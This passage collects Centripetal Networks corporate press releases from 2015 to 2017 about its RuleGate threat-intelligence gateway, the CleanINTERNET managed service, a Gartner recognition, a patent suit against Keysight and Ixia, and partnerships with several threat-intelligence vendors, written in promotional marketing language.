seeks both damages and injunctive relief to stop Keysight and Ixia’s continued infringement. Centripetal Networks further noted that it is continuing to investigate Keysight and Ixia’s products and services and will file further claims if additional infringement is discovered. About Centripetal Networks Centripetal Networks Inc. is dedicated to protecting organizations from advanced threats by operationalizing intelligence-driven security. Centripetal delivers the market’s only patented Threat Intelligence Gateway platform. These platforms enable customers to persistently prevent up to 90% of known threats. This is done with rapid correlation capabilities, and automated enforcement of security policies, with millions of IOCs. Centripetal’s CleanINTERNET, a fully managed, intelligence-driven security service, leverages these distinct advantages with its QuickTHREAT and RuleGATE technologies to protect companies of any size. Centripetal is headquartered in Herndon, VA. --- ### [Centripetal Named a 2017 Gartner “Cool Vendor” in Security](https://www.centripetal.ai/company/press/centripetal-networks-named-a-2017-gartner-cool-vendor-in-security) Published: 2017-07-25 Summary: Gartner has named Centripetal a “Cool Vendor.” in the “Cool Vendors in Security for Technology and Service Providers, 2017” report Herndon, VA – July 25, 2017 – Centripetal Networks, the first company in the cybersecurity market to fully operationalize and automate threat intelligence through its Threat Intelligence Gateway platform, today announced that Gartner, Inc. has named Centripetal to the list of “Cool Vendors” in the “Cool Vendors in Security for Technology and Service Providers, 2017” report, authored by Ruggeru Contu, Lawrence Pingree, Deborah Kish and Dale Gardner. Gartner is widely viewed as the leading industry analyst firm for the cybersecurity market. The distinguished designation as a 2017 Cool Vendor by Gartner, recognizes the innovation that Centripetal is delivering to customers with persistent protection of advanced threats by operationalizing intelligence-driven security. “We are honored to be recognized as a 2017 Cool Vendor by Gartner,” said Steven Rogers, CEO of Centripetal Networks. “We are delivering a new set of capabilities for security teams with our technology by removing manual investigation against millions of compromise indicators, and dramatically reducing the volume of network events.” Centripetal is operationalizing threat intelligence at unmatched speed and scale in the cybersecurity market. With the capability to automatically enforce millions of complex IOC-generated rules in seconds and to apply them to live traffic, Centripetal is significantly reducing workloads and dramatically improving the security posture of the enterprise. Centripetal has achieved unprecedented breakthroughs in scale, speed, and in the operationalization of cyber defense at full network speed with zero performance impact. With the integration of over 3,000 specialized threat feeds through 40+ intelligence partners, Centripetal delivers a truly scalable and dynamic threat prevention platform to the enterprise and Federal agencies. About Centripetal Networks Centripetal Networks Inc. is dedicated to protecting organizations from advanced threats by operationalizing intelligence-driven security. Centripetal delivers the market’s only patented Threat Intelligence Gateway platform to customers so they can persistently prevent up to 90% of known threats with rapid correlation capabilities, and automated enforcement of millions of IOC policies. Centripetal’s CleanINTERNET, a fully managed, intelligence-driven security service, leverages these distinct advantages with its QuickTHREAT and RuleGATE technologies to protect companies of any size. Centripetal is headquartered in Herndon, VA. (Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.) --- ### [Centripetal Unveils CleanINTERNET® Managed Security Service](https://www.centripetal.ai/company/press/cleaninternet-managed-security-service) Published: 2017-06-27 Summary: Centripetal Networks, the leading provider of Real-Time Network Defense solutions, today announced the immediate availability of CleanINTERNET®, a robust Managed Security Service offering. Intelligence defense service proactively shields enterprises with scale and coverage that no other provider can offer. HERNDON, Va., June 27, 2017 /PRNewswire/ -- Centripetal Networks, the leading provider of Real-Time Network Defense solutions, today announced the immediate availability of CleanINTERNET®, a robust Managed Security Service offering. CleanINTERNET features network-based prevention of extensive known threats and unprecedented advanced detection capabilities via Centripetal’s leading threat intelligence gateway platform RuleGate®. This new service allows customers to take full advantage of our innovative intelligence-driven cyber capabilities. The intelligence defense service comprises four (4) tightly integrated components, which include: • The industry’s most powerful threat intelligence enforcement gateway – a purpose-built, patented, high performance gateway that is unmatched in the industry. Capable of analyzing every packet, at full line speed, entering and leaving the network. • Dynamic real-time threat intelligence service – a collection of valuable threat intelligence data that originates from a host of specialized sources, collectively representing over many millions of individual Indicators of Compromise (IOCs). The data is meticulously curated for maximum effectiveness and encompasses a high percentage of the entire threat surface. • Cloud-based analytics visibility manager – a security dashboard that provides strategic information to monitor security posture and threats. This tool helps security experts understand the threat landscape, including attack history, policies, traffic patterns, transaction PCAP, and other important security metrics. • Industry expert security analyst support – a dedicated team, which is the foundation of the service. Experts to assist in incident review, adapting intelligence policies, and creating tailored risk models. We analyze the current threat mitigation workflow and identify ongoing efficiency opportunities. “This service offers day-one value to our customers by leveraging threat intelligence, our industry leading gateway, and powerful analytics”, said Steven Rogers, CEO of Centripetal Networks. “Enterprises should first eliminate the no-business, known-risk activity from their networks. Why let this stuff in, when you don’t have to? For our customers, we cut their exposure and event volume by more than 90%, which comes from so many known threats. When you receive millions of security events a year, that's a big deal.” Centripetal’s experienced team makes the implementation process quick and easy, allowing customers to realize significant benefits immediately upon activation. We employ best practices throughout the engagement lifecycle to maximize value. Account management by knowledgeable security analysts helps strengthen and optimize the enterprise security posture. About Centripetal Networks Centripetal Networks Inc. is the inventor and leading provider of Threat Intelligence Gateways. Centripetal’s solutions enable the work of thousands of analysts to be rendered on behalf of any enterprise. Centripetal has achieved many breakthroughs in the scale and speed of network filtering to make an intelligence defense possible. These solutions are the first and only that are able to action threat intelligence at scale, line-rate speed, and with full agility. Threat intelligence can now directly drive an active cyber defense. Centripetal’s offering includes CleanINTERNET® a fully managed intelligence defense service, a comprehensive line of virtual and physical RuleGate® ultra-high performance network filters, QuickThreat® the industry’s first real-time threat analytics platform, and the Advanced Cyber Threat™ intelligence service. Centripetal holds over fifty patents on advanced cyber security systems and technologies. Centripetal is partnered with over 40 intelligence partners and has integrated over 3,000 specialized threat feeds. Centripetal’s customers include commercial enterprises of all sizes, as well as federal government agencies. Trillions of dollars in annual transaction value is processed through the networks we protect. Gartner, Inc. has named Centripetal a “Cool Vendor” in security for 2017. Read the full article on PRNewswire --- ### [Centripetal Networks Joins with Infoblox](https://www.centripetal.ai/company/press/centripetal-infoblox-threat-intelligence) Published: 2016-07-26 Summary: Centripetal announced it is joining with Infoblox to provide a platform to easily apply cyber threat intelligence to directly defend networks. Centripetal Networks Joins with Infoblox to Offer Actionable Threat Intelligence HERNDON, VA. (PRWEB) JULY 26, 2016 RuleGate® Network Protection System Includes ActiveTrust Threat Intelligence Data from Infoblox Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, today announced it is joining with Infoblox to provide a platform to easily apply cyber threat intelligence to directly defend networks with up-to-date intelligence. The relationship further expands Centripetal’s RuleGate® Network Protection System with the addition of Infoblox’s ActiveTrust data, which combines threat intelligence from trusted white-hat allies, including law enforcement agencies and internet infrastructure providers, with vetted data from select open-source providers. “Today’s threat landscape makes it critical for organizations to have the most comprehensive threat intelligence available,” said Steven Rogers, founder and CEO of Centripetal Networks. “Infoblox’s ActiveTrust data provides the additional intelligence and insights our customers need to act on very real threats.” Centripetal’s RuleGate® Network Protection System dynamically updates threat intelligence from Infoblox, and more than 40 other sources, normalizes the intelligence, and applies it to the network to alert, block or redirect malicious traffic. The platform includes the Advanced Cyber Threat™ (ACT) service, the RuleGate® network appliance and QuickThreat®, Centripetal Networks’ real-time threat intelligence analytics application. “Joining with Centripetal Networks expands both our reach and enterprise organizations’ capabilities in detecting threats to their corporate networks, employees and customers,” said Lars Harvey, vice president of security strategy at Infoblox. “There is an urgent need for actionable threat intelligence and we are happy to contribute to Centripetal Networks’ ecosystem.” About Centripetal Networks Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to block, alert or monitor advanced threats at unmatched speed using up to 5 million threat intelligence indicators of compromise. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform and the Advanced Cyber Threat™ (ACT) service. Please visit https://centripetal.ai. --- ### [Centripetal joins FireEye Cyber Security Coalition](https://www.centripetal.ai/company/press/fireeye-cyber-security-coalition) Published: 2016-06-03 Summary: FireEye cyber security coalition adds 12 new technology partners, leads simplification of security within FireEye's global threat management platform FIREEYE CYBER SECURITY COALITION ADDS 12 NEW TECHNOLOGY PARTNERS, LEADS SIMPLIFICATION OF SECURITY WITHIN FIREEYE GLOBAL THREAT MANAGEMENT PLATFORM NEW FIREEYE ISIGHT INTELLIGENCE, FIREEYE SECURITY ORCHESTRATOR, AND THREAT ANALYTICS PLATFORM PARTNERS ENHANCE THREAT DETECTION AND RESPONSE MILPITAS, Calif. – June 3, 2016 – FireEye, Inc. (NASDAQ: FEYE), the leader in stopping today’s advanced cyber attacks, today announced the addition of 12 new technology partners to the FireEye® Cyber Security Coalition (CSC) – an ecosystem designed to simplify customers’ complex security environments via the intelligence-led FireEye Global Threat Management Platform. The new partners have enhanced the Cyber Security Coalition, which is designed to better protect joint customers. These enhancements include the strategic partners from recently acquired iSIGHT Partners and Invotas, as well as new, completed FireEye integrations. FireEye’s new CSC partners are as follows: Anomali BMC Software Centrify Centripetal Networks Corvil Defcon Cyber Exabeam Recorded Future, Inc RiskVision Siemplify Syncurity Ziften “Security teams are being hampered within today’s complex security environments that can slow operation and response times, exacerbating resource constraints,” said Ed Barry, VP, Cyber Security Coalition, FireEye. “Our latest enhancements and FireEye CSC partnerships address this by streamlining the functionality of our automation, orchestration, and threat intelligence capabilities. With the ability to detect and respond faster, we are enabling our customers to better manage their resource gaps.” Cyber Security Coalition technology partnerships and integrations form a key part of the recently launched FireEye Security Orchestrator™ (FSO) and FireEye iSIGHT™ Intelligence. By providing roadmap visibility, engineering support, and other integration services, customers are assured that they can more seamlessly unify their complex security environments. Seven of the newly added partners and four previously announced CSC partners have also completed 12 new integrated solutions. These new technology integrations are as follows: Anomali: FireEye iSIGHT Intelligence – OPTIC BeyondTrust: Threat Analytics Platform – BeyondInsight Blue Coat: FireEye Security Orchestrator – ProxySG BMC Software: FireEye Security Orchestrator – Remedy Centripetal Networks: FireEye iSIGHT Intelligence – RuleGate Corvil: FireEye iSIGHT Intelligence – Security Analytics Defcon Cyber: FireEye iSIGHT Intelligence HPE: FireEye Security Orchestrator – ArcSight ESM Lieberman Software: Threat Analytics Platform – Privileged Access Management & Enterprise Random Password Manager Recorded Future, Inc: FireEye iSIGHT Intelligence – Intel Cards Ziften: FireEye iSIGHT Intelligence About the FireEye Cyber Security Coalition The Cyber Security Coalition (CSC) is a technology integration program that teams with over 60 leading security companies to integrate solutions with the FireEye Global Threat Management platform. CSC is dedicated to decreasing the time it takes for joint enterprise customers to detect, prevent, analyze, and respond to attacks by unifying security workflows and increasing security professionals’ visibility across threats. CSC Program partners represent the best-of-breed security providers in Cloud Security, Identity & Access Management, Privileged Account Management, Instrumentation, Mobile Security, and Threat Intelligence Platforms, among others, and they help enhance the technology, intelligence, and services expertise that the FireEye platform offers to its customers. For more information about the FireEye Cyber Security Coalition, including how to become a FireEye CSC partner, please visit: https://www.fireeye.com/partners/alliance-partners.html. About FireEye, Inc. FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection to enterprises and governments worldwide against the next generation of cyber attacks. These highly sophisticated cyber attacks easily circumvent traditional signature-based defenses, such as next-generation firewalls, IPS, anti-virus, and gateways. The FireEye Threat Prevention Platform provides real-time, dynamic threat protection without the use of signatures to protect an organization across the primary threat vectors and across the different stages of an attack life cycle. The core of the FireEye platform is a virtual execution engine, complemented by dynamic threat intelligence, to identify and block cyber attacks in real time. FireEye has over 4,700 customers across 67 countries, including more than 730 of the Forbes Global 2000. --- ### [Centripetal Networks Announces Partnership with Intel 471](https://www.centripetal.ai/company/press/centripetal-partnership-intel-471) Published: 2016-03-01 Summary: Centripetal Networks partners with Intel 471, provider of actor-centric threat intelligence gathering and reconnaissance against financially motivated cyber criminals and hacktivists. Centripetal Networks partners with Intel 471, provider of actor-centric threat intelligence gathering and reconnaissance against financially motivated cyber criminals and hacktivists. The partnership leverages Intel 471 threat intelligence collection through Centripetal Network’s RuleGate® Protection System. HERNDON, VA - March 01, 2016 RuleGate® Network Protection System Now Includes Actionable Intelligence into Threats from the Dark Web. Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, today announced a partnership with Intel 471, provider of actor-centric threat intelligence. This new partnership leverages Intel 471 threat intelligence collection through Centripetal Networks' RuleGate® Protection System. Centripetal Networks will provide live demonstrations of Intel 471 intelligence collection at RSA Conference this week in booth S2718 in the South Hall of the Moscone Center. Intel 471 provides actor-centric threat intelligence gathering and reconnaissance against financially motivated cyber criminals and hacktivists. Their vigilant surveillance focuses on infiltrating and penetrating the enemy’s territory, specifically the underbelly of the Internet and the deep/dark web. Intel 471 deploys elaborate methods, significant resources and vast experience to establish and maintain critical access. “Today’s threat landscape has changed dramatically and the ability to surveil the dark web is critical to any organization with something to lose,” said Steven Rogers, Founder and CEO of Centripetal Networks. “The addition of Intel 471, gives companies the added insight needed to act on these threats.” Centripetal’s RuleGate® Network Protection System dynamically updates threat intelligence from Intel 471 and more than 40 sources, normalizes the intelligence, and applies it to the network to alert, block, or redirect malicious traffic. The platform includes the Advanced Cyber Threat™ (ACT) service, the RuleGate® network appliance, and QuickThreat®, Centripetal Networks’ real-time threat intelligence analytics application. “Now more than ever, companies need to access a full complement of threat intelligence to properly assess and act on threats,” said Mark Arena, CEO of Intel 471. “Partnering with Centripetal Networks expands our reach to organizations that might not be looking at the dark web as the attack vector it has come to be.” About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to block, alert or monitor advanced threats at unmatched speed using up to 5 million threat intelligence indicators of compromise. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform and the Advanced Cyber Threat™ (ACT) service.   About Intel 471 The mission of Intel 471 is to protect your brand, your products, your finance and your people. Intel 471 provides actor-centric intelligence gathering and reconnaissance with specialists located globally who are experts in their region. Intel 471 is incorporated in the United States. For more information, please visit https://www.intel471.com. --- ### [Centripetal Announces RuleGate® System Enhancements](https://www.centripetal.ai/company/press/rulegate-network-protection-system-2-7) Published: 2016-02-29 Summary: Centripetal releases RuleGate® Network Protection System (NPS) 2.7, a fully integrated threat intelligence based defense platform. Centripetal Networks Announces RuleGate® Network Protection System Enhancements Centripetal Networks releases RuleGate® Network Protection System (NPS) 2.7, a fully integrated threat intelligence based defense platform. With threat profiles and thresholds, organizations can now prioritize threats based on business enterprise security policies to ensure the most urgent threats are dealt with first. HERNDON, VA - February 29, 2016 Threat Intelligence Platform Provides Highest Throughput and Uses Broadest Range of Sources to Deliver Prompt, Actionable Information Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, today announced the release of RuleGate® Network Protection System (NPS) 2.7, a fully integrated threat intelligence based defense platform. The RuleGate® Network Protection System dynamically updates threat intelligence from more than 40 sources, normalizes the intelligence, and applies it to the network to alert, block or redirect malicious traffic. The platform includes the Advanced Cyber Threat™ (ACT) service, the RuleGate® network appliance and QuickThreat®, Centripetal Networks’ real-time threat intelligence analytics application. To see a live RuleGate® demo at the RSA Conference, please visit Centripetal Networks at booth S2718 in the South Hall of the Moscone Center. “Today’s attacks are more complex than ever. Geography, type of attack and the ability to infiltrate a network and simply wait for the right time to strike are pushing business leaders, security administrators and their teams to the brink,” said Steven Rogers, Founder and CEO of Centripetal Networks. “Our newest product optimizes threat intelligence enabling organizations to understand and prioritize security threats based on individualized business needs.” New RuleGate® features meet the business and technical need for identifying, prioritizing and remediating threats before an attack is underway. With threat profiles and thresholds, organizations can now prioritize threats based on business enterprise security policies to ensure the most urgent threats are dealt with first. RuleGate® is the only threat intelligence tool that has: Intelligent Packet Capture – PCAP data focused on the threat and made available directly to the cyber analyst. SSL Inline Content Inspection – deployment option provides visibility into encrypted traffic with inline inspection and filtering of SSL encrypted traffic and no loss of network performance. Multi-Dimensional Indicators – multi-dimensional indicators factor in 5-tuple network information in combination with IP, Domain or URL Indicators to form more precise identification. Other important new features include: Network Path Correlation – identifying the exact host inside the network, the path taken through the network security tools, and to specific hosts outside the network in real-time, giving security teams the ability to locate and potentially quarantine infected devices. Live Geographic Visualizer – visualizing threat based activity across multiple network locations live gives organizations the opportunity to choose a course of action based on business needs – whether to block all traffic or remain vigilant. Pivot to Source – analysts pivot to the original threat intelligence source for the most up-to-date intelligence context informing teams of the advanced threat. Eight Network Filtering Ports – with eight 100M/1G/10G network filtering ports, a single RuleGate® provides additional filtering, correlation, and high availability in the most advanced network deployments. Support for 802.AD QinQ Nested VLAN Tags – with support for 20 Gb/s of aggregate throughput and VLAN tags, single devices can handle larger portions of the network, easing a complex deployment strategy. Centripetal’s ACT service leverages partnerships with more than 40 threat intelligence sources including Cyveillance, AlienVault, CrowdStrike, EmergingThreats, iDefense by Verisign, Internet Identity, iSightPartners, ThreatConnect and ThreatTrack. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to block, alert or monitor advanced threats at unmatched speed using up to 5 million threat intelligence indicators of compromise. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform and the Advanced Cyber Threat™ (ACT) service.   --- ### [Centripetal Announces Partnership with The Media Trust](https://www.centripetal.ai/company/press/centripetal-announces-partnership-media-trust) Published: 2015-12-02 Summary: Centripetal’s RuleGate® appliance operationalizes real-time malware intelligence data from The Media Trust to protect enterprises from everyday... Centripetal’s high-performance RuleGate® appliance operationalizes real-time malware intelligence data from The Media Trust to protect enterprises from everyday employee Internet use. HERNDON, VA - December 02, 2015 Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, announces their strategic partnership today with The Media Trust, a leading provider of real-time threat monitoring and detection services. This partnership will deliver a proactive network enforcement solution to organizations by enabling Centripetal’s high-performance RuleGate® platform to leverage The Media Trust’s Digital Threat Intelligence (DTI), real-time threat data consisting of actual malware attacking websites and Internet users via compromised digital advertisement and third-party code used to render websites. DTI is unlike any other threat data because its intelligence is generated entirely from The Media Trust’s own proprietary ad tag and website monitoring service, which scans and analyzes the website source code, ad tags, third-party domains and any external calls executing on the world’s largest, most heavily trafficked digital properties for anomalous, suspicious or malicious activity. With this panoramic view into the online and mobile ecosystem, DTI provides the real-time, tactical and original source malware data that security operations center (SOC) and information security teams need to protect their networks, digital properties and the everyday Internet activity of employees. Centripetal offers the Network Protection System, a fully integrated pro-active network defense platform. The core component of this platform is the RuleGate appliance, which blocks and alerts on events in real-time while providing attack visualizations and analytics. RuleGate enforces cyber security policies with millions of rules—at full line rate—and without any degradation in network performance. Centripetal Networks’ RuleGate ingests The Media Trust’s Digital Threat Intelligence and responds to those threats immediately, preventing the delivery of malicious exploits on the network before they become overt. This joint solution seamlessly removes malicious content often inserted in some of the world’s most heavily trafficked websites and mobile apps via compromised content, third-party code or advertisements. “Together, Centripetal Network’s proactive network defense platform and The Media Trust’s real-time threat data provide CISOs and their teams with an unprecedented level of protection against web-based malware,” says Chris Olson, The Media Trust’s CEO and co-founder. “This partnership not only brings together two best-of-breed offerings, but also marks a radical departure in how to successfully combat malicious threats to the enterprise due to everyday employee Internet use.” “We are excited to announce the integration between our solution and the extensive malicious content feeds provided by The Media Trust,” said Steven A. Rogers, Founder and CEO of Centripetal Networks. “Our customers have already seen great success in this integration and look forward to providing organizations across all industries with the new level of security that this combined solution offers.” Be sure to find both Centripetal Networks and The Media Trust at the NG Security Summit this week, from December 2 – 4 in Austin, Texas, to learn more about this integration. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service.   © 2015 Centripetal Networks, Incorporated. All rights reserved. Centripetal, the Centripetal logos, RuleGate and QuickThreat are trademarks or registered trademarks of Centripetal Networks, Inc. in the United States and/or other countries. About The Media Trust The Media Trust works with the world’s largest, most-heavily trafficked digital properties to provide real-time security, first-party data protection and privacy, performance management and quality assurance solutions that help protect, monetize and optimize the user experience across desktop, smartphone, tablet and gaming devices. As the global leader in monitoring the online and mobile ecosystems, The Media Trust leverages a physical presence in 65 countries and 500 cities around the globe to continuously scan websites, ad tags and mobile apps and alert on anomalies affecting websites and visitors alike. More than 500 publishers, ad networks, exchanges, agencies and corporates—including 40 of comScore's AdFocus Top 50 websites—rely on The Media Trust to protect their website, their employee internet use, their revenue and, most importantly, their brand. Visit The Media Trust for more information. --- ### [Centripetal Announces Partnership with ISIGHT Partners](https://www.centripetal.ai/company/press/centripetal-announces-partnership-with-isight-partners) Published: 2015-07-29 Centripetal’s high-performance RuleGate® appliance operationalizes cyber threat intelligence from iSIGHT’s ThreatScape® services to deliver actionable threat intelligence. HERNDON, VA - July 29, 2015 Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, announces their partnership today with iSIGHT Partners, a leading provider of global threat intelligence. This partnership will deliver a pro-active enforcement solution to organizations across all industries by enabling Centripetal’s high-performance RuleGate® platform to leverage the advanced threat intelligence from iSIGHT’s ThreatScape® subscriptions. Centripetal’s RuleGate appliance is a Pro-Active Network Defense system able to block and alert events in real-time with attack visualizations and analytics. RuleGate enforces cyber security policies with millions of rules – at full line rate – and without any degradation in network performance. Conventional network defenses simply cannot scale to meet the breadth of today’s threats. The RuleGate platform offers cyber analysts full visibility into which hosts are communicating from inside the network to specific hosts outside the network, in real-time. RuleGate is the key component of Centripetal’s Network Protection System, a fully integrated Active Network Defense platform that includes Centripetal’s full line of hardware and software solutions. With 300 security experts positioned around the world, iSIGHT Partners is able to deliver global threat intelligence that is truly unique to the industry. ThreatScape subscriptions equip enterprises with the intelligence necessary to align their security program with business risk management goals to defend against new and emerging cyber threats. iSIGHT’s ThreatScape intelligence provide analysts with rich, contextual reporting that includes the motivation and intent of adversaries, their campaigns and technical indicators, the malware used, and the vulnerabilities being exploited. Through the integration of iSIGHT Partners’ cyber intelligence with the RuleGate platform, organizations can activate large-scale policies in seconds while applying million-scale unique indicators to every packet entering and exiting the network, without creating any degradation in network performance. Centripetal Networks utilizes iSIGHT’s ThreatScape intelligence, which the RuleGate then operationalizes to enable organizations to block and alert on threats in real-time, preventing data theft on the network before it occurs. Currently, retailers and large financials are actively relying on this integrated capability to prioritize their network defenses. Based on observed indicators on the network, these organizations can evaluate their security posture and fix vulnerabilities before a breach. iSIGHT Partners often releases new intelligence on advanced adversaries within days of discovery, which provides customers with timely and relevant defensive capabilities across various industries.“With RuleGate, the Centripetal team has developed a very advanced and highly scalable means of operationalizing threat intelligence and significantly reducing risk for its customers,” noted Karl Hutter, iSIGHT vice president, strategic partnerships and channel. “The combination of ThreatScape and RuleGate is a win for customers fighting the battle against advanced threats." “We are pleased to integrate iSIGHT Partners’ industry-leading cyber intelligence with the Centripetal Networks solution,” said Steven A. Rogers, Founder and CEO of Centripetal Networks. “By leveraging the global threat intelligence from ThreatScape, we are able to provide organizations with a new level of security and equip cyber analysts with the most-advanced, instantaneous data correlation available. We use this solution on our own network and believe wholeheartedly in its abilities.”About CentripetalCentripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. © 2015 Centripetal Networks, Incorporated. All rights reserved. Centripetal, the Centripetal logos, RuleGate and QuickThreat are trademarks or registered trademarks of Centripetal Networks, Inc. in the United States and/or other countries.About iSIGHT PartnersiSIGHT Partners is the leading global provider of cyber threat intelligence. With 300+ experts in 16 countries and expertise in 24 languages, only iSIGHT can deliver the full context and intent of the most damaging threats, allowing security organizations to respond faster, defend proactively, and invest smarter. Find out more about iSIGHT Partners. --- ### [Announcing the latest release of RuleGate®](https://www.centripetal.ai/company/press/centripetal-rulegate-latest-release) Published: 2015-04-20 Summary: Centripetal's RuleGate® Network Protection System, in its latest release now offers enterprises with a new set of cyber defense capabilities. Centripetal's RuleGate® Network Protection System, in its latest release now offers enterprises with a new set of cyber defense capabilities. HERNDON, VA - April 20, 2015 Centripetal Networks Inc., the leading provider of Real-Time Active Network Defense solutions, today announces the release of their RuleGate® Network Protection System (NPS) 2.4, a fully integrated threat intelligence based defense platform. This latest version of NPS will bring a whole new set of cyber defense capabilities and visualizations to organizations, enhancing their network security. NPS integrates each component in Centripetal’s product offering to provide enterprises with the most advanced, instantaneous data correlation available. The platform includes the Advanced Cyber Threat™ (ACT) service, the RuleGate® network appliance, and QuickThreat®, their real-time threat intelligence analytics application. Centripetal’s Threat Intelligence Partners offer a wide array of threat intelligence, including IPs, Domain Names, and URLs. With this latest release, Centripetal’s platform fully supports all of these Indicators of Compromise, enabling over 3.5 Million indicators from 25 unique partners. With dynamic updates and operational capabilities, organizations are turning Intelligence into Action. “The ability to take timely, relevant threat intelligence and make it actionable on the enterprise is the solution we’ve all been waiting for,” said Eric Olson, VP of Product Strategy at Cyveillance. “Our partnership is enabling our customers to benefit from real-time protection using valuable threat intelligence.” “Adversaries have the advantage today in cyber security,” said Steven Rogers, Founder and CEO of Centripetal Networks. “The time to detect a breach is far too slow compared to the time to get breached in the first place. With Threat Intelligence and NPS, we are closing the gap.” Centripetal’s ACT service leverages partnerships with Cyveillance, AlienVault, CrowdStrike, EmergingThreats, iDefense by Verisign, Internet Identity, iSightPartners, ThreatConnect, ThreatTrack, and many more open source providers and Information Sharing Analysis Centers. To see these capabilities first hand, stop by Centripetal Networks’ booth at RSA this week, where their team members will demonstrate the latest features in NPS 2.4 and how to operationalize threat intelligence. Centripetal Networks will be in booth #S2734 in the South Hall of the Moscone Center. About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high-performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. --- ### [Centripetal Joins AlienVault's OTX Partner Member Program](https://www.centripetal.ai/company/press/centripetal-joins-alienvaults-otx) Published: 2015-04-02 Summary: AlienVault’s Open Threat Exchange (OTX) to integrate into Centripetal Networks’ RuleGate platform for enhanced cyber defenses. AlienVault’s Open Threat Exchange (OTX) to integrate into Centripetal Networks’ RuleGate platform for enhanced cyber defenses. HERNDON, VA - April 02, 2015 Centripetal Networks, the foremost provider of Real-Time Active Network Defense solutions, today announced that they have joined AlienVault’s Open Threat Exchange™ (OTX) partner member program to provide enterprises with a more complete cyber defense system. Under the new partnership, Centripetal Networks will leverage the AlienVault Open Threat Exchange (OTX) through their high-performance RuleGate® platform. AlienVault’s Open Threat Exchange gives its customers access to the world’s largest crowd-sourced threat intelligence platform. Currently, more than 8,000 contributors from 140 countries currently share over 17,000 potentially malicious threats daily. Centripetal Networks’ RuleGate is an Active Network Defense platform with real-time attack visualizations and analytics. As each attack is detected and blocked, RuleGate produces a real-time information feed of the threats, which is then presented in Centripetal’s breakthrough logging application, QuickThreat®. This enables threat intelligence-based alerts to be analyzed in real time. "We are pleased to announce our partnership with AlienVault as this will enable us to bring the advanced data streams from their threat intelligence platform into RuleGate to heighten organization’s cyber defenses,” said Steven A. Rogers, Founder and CEO of Centripetal Networks. “The threat landscape is ever-evolving and expanding, making the need for a more complete solution all the more prevalent. Traditional security systems simply cannot meet the breadth of today’s attacks. Persistent threats require persistent solutions.” The partnership between AlienVault and Centripetal Networks operationalizes the intelligence streams from OTX within Centripetal’s products, giving organizations the ability to block or alert on cyber threats as they occur, without creating any degradation in network performance or user experience. This integration brings together a powerful and necessary solution in the cyber security field. Every day attacks are becoming more complex, which calls for a cyber defense system that provides the most advanced, fully correlated data available with the ability to act upon it. The solution created by Centripetal Networks, powered by AlienVault OTX, provides just that. “We’re excited for the opportunity to partner with Centripetal Networks in their efforts to support customers in staying ahead of today’s increasingly complex security landscape,” said Andy Johnson, SVP of Business Development at AlienVault. “Through this partnership, we look forward to getting AlienVault OTX in the hands of more security professionals in order to support the broader industry in maintaining secure systems." About Centripetal Centripetal Networks Inc. is a cyber-security solutions provider specializing in Real-Time Active Network Defense. Centripetal has achieved several breakthroughs in the scale and speed of network protection. Centripetal’s RuleGate® product is the first and only system able to action threat indicators at scale, at full line-rate speed, and with agility. Threat intelligence can now directly drive an active cyber defense without negatively impacting network performance or user experience. Centripetal’s offering includes the RuleGate® a unique ultra high performance network appliance, QuickThreat® the industry’s first real-time threat visualization and analytics platform, and the Advanced Cyber Threat™ (ACT) service. About AlienVault AlienVault is the champion of mid-size organizations that lack sufficient staff, security expertise, technology or budget to defend against modern threats. Our Unified Security Management (USM) platform provides all of the essential security controls required for complete security visibility, and is designed to enable any IT or security practitioner to benefit from results on day one. Powered by the latest AlienVault Labs Threat Intelligence and the Open Threat Exchange—the world’s largest crowd-sourced threat intelligence 